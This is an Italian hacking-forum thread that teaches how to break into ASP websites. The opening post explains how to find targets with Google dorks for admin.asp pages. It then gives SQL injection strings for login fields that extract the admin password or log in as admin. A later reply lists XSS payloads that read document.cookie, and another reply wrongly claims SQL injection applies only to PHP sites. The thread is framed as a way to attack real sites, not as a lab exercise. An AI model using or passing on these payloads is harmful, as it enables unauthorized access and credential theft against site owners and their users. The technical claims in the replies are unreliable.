-- ASP injection-- hackerare sito in .asp

« Older   Newer »
  Share  
zenzone
view post Posted on 29/4/2008, 21:23




Hackerare un sito in ASP

Per prima cosa su google dovete usare il google hacking per trovare i siti provate {allinurl:admin.asp} oppure {inurl:admin.asp}.
Cmq queste sono solo delle ipotesi...dovete essere crativi...

Come hackerare un sito fatto in .asp
Prima passo portiamoci in una pagina che preveda un
login utente, poi dove si inserisce l' userID bisogna inserire
' (l'apostrofo) ed inviare,
non bisogna inserire alcun tipo di password.
Se tutto è andato a buon fine, dovrebbe apparire un messagio del tipo:
Microsoft OLE DB Provider for ODBC Drivers error
'80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query
expression 'ID=''' AND PASSWORD='''.
/scripts/login.asp, line 30
in caso contrario ci apparirà un messagio che ci informa che userID o la
password sono errati ( in questi casi molto probabilmete non sono possibili
azioni maliziose).
Ora tornando alla nostra applicazione modificabile iniziamo a ricercare
informazioni come lo scoprire se esiste o meno un utente admin andando ad
inserire nella zona dell' userID il seguente comando:
' union select min(UserID),1,1,1 from members where
UserID > 'a'--
oppure possiamo tentare di trovare addirittura la
password dell' admin inserendo sempre nel campo dell' userID il comando:
' union select Password,1,1,1 from members where
UserID = 'admin'--
di questi comandi simili ce ne sono parecchi come ad esempio:
admin' --
che ci permette di validarci come admin oppure un' altro comando potrebbe
essere:
' or 0=0 --sp_password
che ci permetterà il login come il primo utente presente nella lista.

Grazie, vi saluto ciaoooo.. :)
 
Top
lobuono92
view post Posted on 25/6/2008, 10:59




guarda ke qst è una ASP-injection nn una SQL-injection

le sql sono x siti in php le asp sono x siti in asp

in poche parole le sql sono ignezioni di codice malizioso ke ci da la pass criptata invece le asp sono dei bypass dell'admin inserendo le variabili 'or' ecc
 
Top
Percezione_90.3
view post Posted on 12/6/2009, 15:58




Malizioso o malevolo ? lol
 
Top
Gr4Ph1c22™
view post Posted on 13/7/2010, 17:32




asp injection è una forma di sql,non esiste l'asp.
Informati prima di postare I N T E L L I G E N T E
 
Top
quote
view post Posted on 2/4/2014, 00:22




<script>alert("xss");</script>

“%3e%3cscript%3ealert(document.cookie)%3c/script%3e

"><script>alert("xss");</script>

“><scr<script>ipt>alert(document.cookie)ipt>

“><script>alert(document.cookie)</script>

'"()&%1<script >prompt(992442)</script>
 
Top
4 replies since 29/4/2008, 21:23   6939 views
  Share